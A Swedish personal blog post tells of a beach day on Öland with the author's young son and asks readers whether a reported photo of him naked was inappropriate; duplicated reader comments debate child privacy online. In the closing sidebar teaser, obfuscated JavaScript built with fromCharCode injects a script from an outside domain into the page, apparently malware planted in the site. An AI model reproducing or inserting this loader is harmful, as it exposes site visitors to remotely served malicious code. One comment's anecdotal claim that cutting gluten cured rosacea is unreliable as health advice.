Naken bilder rätt eller fel?! Tack snälla Amanda! Kvalitets tid!

IMG_6250

Hej på dig! Jösses vilken svettig natt det har varit! Igår kväll så var det över 30grader i hela lägenheten. Fönster strategiskt öppna så att det skulle bli korsdrag, gardinerna fördragna på dagen…. men ändå sjukt varmt! Nu ska man ju absolt inte klaga, då det bara säger svisch så är hösten här. Men ändå 😉 Jag tänker på alla er som väntar barn…. kämpigt!

Måndag, ny vecka, och nya möjligheter! Jag var för FÖRSTA gången på hela sommaren på stranden med Ludvig igår =) Jag fick ju min diagnos Rosacea, tidigare i sommras. Därav att jag går på denna medicinen, och alltså inte får vara i solen. Juni, juli, augusti och september! Man tackarrrrr 😉

IMG_6249

Men igår så bestämde jag mig för att hitta skugga på någon strand. Folkskygg som jag kan vara ibland så körde vi låååångt bort! Genom, vacker miljö underbar natur och omgiven utav Öländska alvaret. IMG_6248 IMG_6247

För att tillslut komma fram till ett smultronställe som en god vän visade för mig för flera år sedan. Jag själv har inte varit där på tre år. Sista gången jag var där så åkte jag dit när det små regnade lite, Jag hade då Ludvig i magen och behövde komma undan för att rensa tankarna. Jag kan bara inte fatta att det har gått tre hela år sedan dess! IMG_6322 IMG_6277

Kaffe är ett måste på beachen. Men min absoluta favorit fika att ha med sig är ägg & köttbulle macka =) Jag fick alltid det utav min mamma, och jag kommer alltid att skicka med Ludvig det. Det är ändå lite matigare och det brukar gå hem hos dom flesta kidsen =) IMG_6274

 

IMG_6279 IMG_6311

Denna söta bilden la jag upp på min instagram igår.. Ramaskri!!! Hur kunde jag vara så elak/dum att utsätta mitt barn för det? Med alla pedofiler som cirkulerar på nätet osv….

Den är väl bara underbar?  Jag blev anmäld/rapporterad för olämpligt innehåll, pga att det är en naken liten kille ?!!!! WTF?! Det är ju mitt barn, och han visar ju inte ”juvelerna” Visst är det väl konstigt? Jag visste faktiskt inte ens om att man kunde bli det? Hmm… vad tycker du? Är denna bilden högst olämplig? Jag själv ser många mycket mer avslöjande bilder än denna som cirkulerar på instagram??

Tacksam för svar!

IMG_6300 IMG_6276 IMG_6291 IMG_6259

 

Min lilla nakenfis var mer än nöjd igår =)  Precis innan vi skulle åka till stranden så åkte vi förbi butiken. Där väntade en utav mina bloggläsare/instagram följare. Denna tjejen har kommenterat mycket så jag visse precis vem hon var. Världens sötaste Amanda <3 Gulle dig att komma förbi mig med presentpåse och kramar!IMG_6244

 

 

Titta vilka ljuvliga armband som hon har gjort åt mig….  ”My & Lilleman” IMG_6340

Korten var också handgjorda, alltså jag kan inte beskriva med ord hur rörd man faktiskt blir! Att få höra att man är hennes förebild, och denna varma omtänksamma känslan till sig är helt obeskrivligt! Från hjärtat,Tack snälla du! <3IMG_6338

Även Ludvig fick ett paket, han var mer än nöjd även nu 😉 Min son är bil tokig!IMG_6341

 

 

När vi lämnade stranden igår så träffade vi på en väninna som jag inte träffat på galet länge! Så vi följde med hem på en spontan fika, kolla in hennes underbara altan: (jag vet det är bara mobil bild, men ändå) Den är fantastisk! IMG_6334 IMG_6333

Fina Emma & Herman! Så här långt mellan gångerna får det faktiskt inte gå mellan gångerna som vi ses 😉 IMG_6331Nu ska jag öppna upp butiken… För att sedan köra till flygplatsen och ta emot besllk som ska bo hos mig i veckan =)

Kram på er! /My Martens

 

 

28 Komentarer

 1. Det är en förfärlig värld vi lever i, när dessa bilder på din urgullige lille son inte kan visas. Jag kan förstå dem som varnar dig, eftersom det finns sjuka människor därute som kan utnyttja bilderna. Själv tycker jag de är jättefina! Han är bara så söt!

  • Hej Ullis! Jag kan absolut förstå att man varnar mig, för världen vi lever skrämmande på många sätt… Men jag skulle Aldrig i mitt liv lägga ut bilder för att skada/utsätta mitt barn på något sätt! =( Tack snälla!

 2. Jag tycker du gör alldeles åt helskotta fel!!! Man behöver inte visa omvärlden hela sitt privata liv och att lämna ut en annan persons nakna underliv är ganska korkat. Så många organisationer har varnat för att lägga ut nakenbilder och du hävdar att ”det är mitt barn”. Äger du honom? Du borde vara mer rädd om honom och värna om hans privatliv än att hela tiden hävda att du gör som du vill med din son som ett slags äganderätt. Ett barn har lika rätt till ett privatliv som de flesta normala människor vill ha. Och du lägger ju inte ut några bilder på dig själv naken utan du poserar med snygga kläder och vackra bilder ( tycker jag!!!) från ditt jobb men varför ska du en liten kille bara förevisas naken`Du har ju inte en utan massor med nakenbilder på killen och du visar visst paketet. Tänk på hans privatliv och faktiskt att samlare snor bilder. Jag hittade en sådan här bild på en porrsajt där någon sammanställt ”sexy babes” och ett par bilder var från familjebloggar. Jag skriver inte det här för att vara taskig och jag har inget emot nakna ungar men nakenhet är privat. Hälsningar!!

  • Jag kan bara säga att jag håller med dig….. Jag kan inte i min vildaste fantasti förstå hur man skulle kunna se något sexuellt i dessa bilder!?! då är man sjuk!

 3. Det är en förfärlig värld vi lever i, när dessa bilder på din urgullige lille son inte kan visas. Jag kan förstå dem som varnar dig, eftersom det finns sjuka människor därute som kan utnyttja bilderna. Själv tycker jag de är jättefina! Han är bara så söt!

  • Hej Ullis! Jag kan absolut förstå att man varnar mig, för världen vi lever skrämmande på många sätt… Men jag skulle Aldrig i mitt liv lägga ut bilder för att skada/utsätta mitt barn på något sätt! =( Tack snälla!

 4. Tyvärr finns det säkert någon galning som gillar bilderna på fel sätt men jag tycker inte bilderna är fel eller för mycket utan härliga sommarbilder typ. Har själv barn på 2,5 o 7 år och då ser man mycket Astrid Lindgren filmer, och varje gång vi ser Madicken där det är en scen där syskonen hoppar runt utan kläder i något sammanhang så tänker jag på hur galen världen blivit där något så naturligt aldrig skulle kunna göras i en barnfilm nuförtiden. tyvärr måste man som sagt tänka sig för med allt på internet men de här bilderna är inget jag skulle reagerat på. ha en fortsatt skön sommar på fina Öland! Har många fina sommarminnen därifrån, det självklara semesterstället för en smålänning!

 5. Jag tycker du gör alldeles åt helskotta fel!!! Man behöver inte visa omvärlden hela sitt privata liv och att lämna ut en annan persons nakna underliv är ganska korkat. Så många organisationer har varnat för att lägga ut nakenbilder och du hävdar att ”det är mitt barn”. Äger du honom? Du borde vara mer rädd om honom och värna om hans privatliv än att hela tiden hävda att du gör som du vill med din son som ett slags äganderätt. Ett barn har lika rätt till ett privatliv som de flesta normala människor vill ha. Och du lägger ju inte ut några bilder på dig själv naken utan du poserar med snygga kläder och vackra bilder ( tycker jag!!!) från ditt jobb men varför ska du en liten kille bara förevisas naken`Du har ju inte en utan massor med nakenbilder på killen och du visar visst paketet. Tänk på hans privatliv och faktiskt att samlare snor bilder. Jag hittade en sådan här bild på en porrsajt där någon sammanställt ”sexy babes” och ett par bilder var från familjebloggar. Jag skriver inte det här för att vara taskig och jag har inget emot nakna ungar men nakenhet är privat. Hälsningar!!

 6. Otroligt sorgligt när folk förstör en vacker bild på ett barn en härlig sommardag. Skärpning gott folk! Man undrar vad ni har i huvudet alla ni som tänker sexualisering så fort något ni ser ett barn lekande i sommarvärmen.

  • Jag kan bara säga att jag håller med dig….. Jag kan inte i min vildaste fantasti förstå hur man skulle kunna se något sexuellt i dessa bilder!?! då är man sjuk!

 7. Tyvärr finns det säkert någon galning som gillar bilderna på fel sätt men jag tycker inte bilderna är fel eller för mycket utan härliga sommarbilder typ. Har själv barn på 2,5 o 7 år och då ser man mycket Astrid Lindgren filmer, och varje gång vi ser Madicken där det är en scen där syskonen hoppar runt utan kläder i något sammanhang så tänker jag på hur galen världen blivit där något så naturligt aldrig skulle kunna göras i en barnfilm nuförtiden. tyvärr måste man som sagt tänka sig för med allt på internet men de här bilderna är inget jag skulle reagerat på. ha en fortsatt skön sommar på fina Öland! Har många fina sommarminnen därifrån, det självklara semesterstället för en smålänning!

 8. Otroligt sorgligt när folk förstör en vacker bild på ett barn en härlig sommardag. Skärpning gott folk! Man undrar vad ni har i huvudet alla ni som tänker sexualisering så fort något ni ser ett barn lekande i sommarvärmen.

 9. De som skriver ”om någon ser nåt sexuellt i dessa bilder är man sjuk” måste förstå att de som ser något sexuellt i dessa bilder är pedofiler, och dessa finns det gott om i världen. Jag arbetar med sexualbrottsdömda män (bla dömda för just sexuella övergrepp mot barn eller barnpornografi) och har fått gå på en föreläsning med Polisen och de som arbetar med att identifiera de barn som på olika bilder cirkulerar på nätet bland pedofiler och barnaförövare (och att få fast förövarna såklart). Efter denna föreläsning lägger jag aldrig upp bilder på nätet på mina barn då jag fick ett iskallt uppvaknande. Det är just sådana ”oskyldiga” bilder som sprids vidare.
  Självklart gör vi alla det vi anser vara bäst för våra barn och vi försöker ju inte medvetet skada dem, däremot önskar jag att alla tänker ett varv till innan man lägger upp bilder och information på nätet. Vissa bilder kanske passar bäst i ett album eller inramad på väggen hemma där de som tittar på bilden ser den för vad det faktiskt är, en glad grabb som leker och njuter av sommaren!

  • Lina, precis så hade jag önskat mig att övriga hade skrivit som inte tyckte att det var ”lämpligt” att My la ut bilderna på nätet.
   Genom att berätta hur det fungerar så inser man som mamma att det kanske inte är värt risken och kanske bestämmer sig utifrån den informationen som man inte riktigt ”tänkte på” att just spara korten i datorn istället för att lägga ut de på nätet.
   Att dock kränka/hota för att man ville bara dela av mysiga sommarbilder utan tanke på dess efterföljder är något helt annat.

 10. De som skriver ”om någon ser nåt sexuellt i dessa bilder är man sjuk” måste förstå att de som ser något sexuellt i dessa bilder är pedofiler, och dessa finns det gott om i världen. Jag arbetar med sexualbrottsdömda män (bla dömda för just sexuella övergrepp mot barn eller barnpornografi) och har fått gå på en föreläsning med Polisen och de som arbetar med att identifiera de barn som på olika bilder cirkulerar på nätet bland pedofiler och barnaförövare (och att få fast förövarna såklart). Efter denna föreläsning lägger jag aldrig upp bilder på nätet på mina barn då jag fick ett iskallt uppvaknande. Det är just sådana ”oskyldiga” bilder som sprids vidare.
  Självklart gör vi alla det vi anser vara bäst för våra barn och vi försöker ju inte medvetet skada dem, däremot önskar jag att alla tänker ett varv till innan man lägger upp bilder och information på nätet. Vissa bilder kanske passar bäst i ett album eller inramad på väggen hemma där de som tittar på bilden ser den för vad det faktiskt är, en glad grabb som leker och njuter av sommaren!

  • Lina, precis så hade jag önskat mig att övriga hade skrivit som inte tyckte att det var ”lämpligt” att My la ut bilderna på nätet.
   Genom att berätta hur det fungerar så inser man som mamma att det kanske inte är värt risken och kanske bestämmer sig utifrån den informationen som man inte riktigt ”tänkte på” att just spara korten i datorn istället för att lägga ut de på nätet.
   Att dock kränka/hota för att man ville bara dela av mysiga sommarbilder utan tanke på dess efterföljder är något helt annat.

 11. Vilken jättefin blogg och otroligt söt lilleman ? Du verkar vara en fantastisk kärleksfull och omtänksam mamma. Så härligt att se.
  Jag vill i all välmening ge min erfarenhet om rosacea. Har själv diagnosistiserats med det för ett antal åren och h a d e stora problem med blossande utslag i ansiktet. Nu kommer ett tips som jag vet kan låta provocerande för många…. Jag vet inte dina kostvanor men vill som sagt i all välmening bara varna för att äta gluten.
  Sen jag slutade med gluten så har min ”rosacea” helt försvunnit. Jag har under en tid även fått detsamma bekräftat från andra. Jag går inte in på orsaker och samband mage och hud eftersom det är en helt egen vetenskap. (För den intressera så finns massor att läsa på nätet)
  Ville bara dela med mig av min egen erfarenhet. Testa eller förkasta ?
  Oavsett så önskar jag dig allt gott My.
  /Bea

 12. Vilken jättefin blogg och otroligt söt lilleman 🙂 Du verkar vara en fantastisk kärleksfull och omtänksam mamma. Så härligt att se.
  Jag vill i all välmening ge min erfarenhet om rosacea. Har själv diagnosistiserats med det för ett antal åren och h a d e stora problem med blossande utslag i ansiktet. Nu kommer ett tips som jag vet kan låta provocerande för många…. Jag vet inte dina kostvanor men vill som sagt i all välmening bara varna för att äta gluten.
  Sen jag slutade med gluten så har min ”rosacea” helt försvunnit. Jag har under en tid även fått detsamma bekräftat från andra. Jag går inte in på orsaker och samband mage och hud eftersom det är en helt egen vetenskap. (För den intressera så finns massor att läsa på nätet)
  Ville bara dela med mig av min egen erfarenhet. Testa eller förkasta 🙂
  Oavsett så önskar jag dig allt gott My.
  /Bea

 13. Hej My.
  Jag tycker att var och en bör få ta eget ansvar över vad de lägger upp på internet. Själv är jag väldigt försiktig med att lägga upp bilder och bilder på barnen lägger jag överhuvudtaget inte upp. Det är lätt att glömma att det som finns där ute i ”cyberrymden” finns där för alltid och alltid. Det finns så många sjuka människor (precis som du själv säger) som kan använda bilderna till allt annat än det du ville med dem. Med det sagt så vill jag säga att det är jättefina bilder och i den bästa av världar så borde vi kunna dela med oss av våra liv utan att oroa oss för sjuklingar och annat ont. Önskar dig en trevlig fortsättning på det som är kvar av sommaren ?

 14. Hej My.
  Jag tycker att var och en bör få ta eget ansvar över vad de lägger upp på internet. Själv är jag väldigt försiktig med att lägga upp bilder och bilder på barnen lägger jag överhuvudtaget inte upp. Det är lätt att glömma att det som finns där ute i ”cyberrymden” finns där för alltid och alltid. Det finns så många sjuka människor (precis som du själv säger) som kan använda bilderna till allt annat än det du ville med dem. Med det sagt så vill jag säga att det är jättefina bilder och i den bästa av världar så borde vi kunna dela med oss av våra liv utan att oroa oss för sjuklingar och annat ont. Önskar dig en trevlig fortsättning på det som är kvar av sommaren 🙂

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/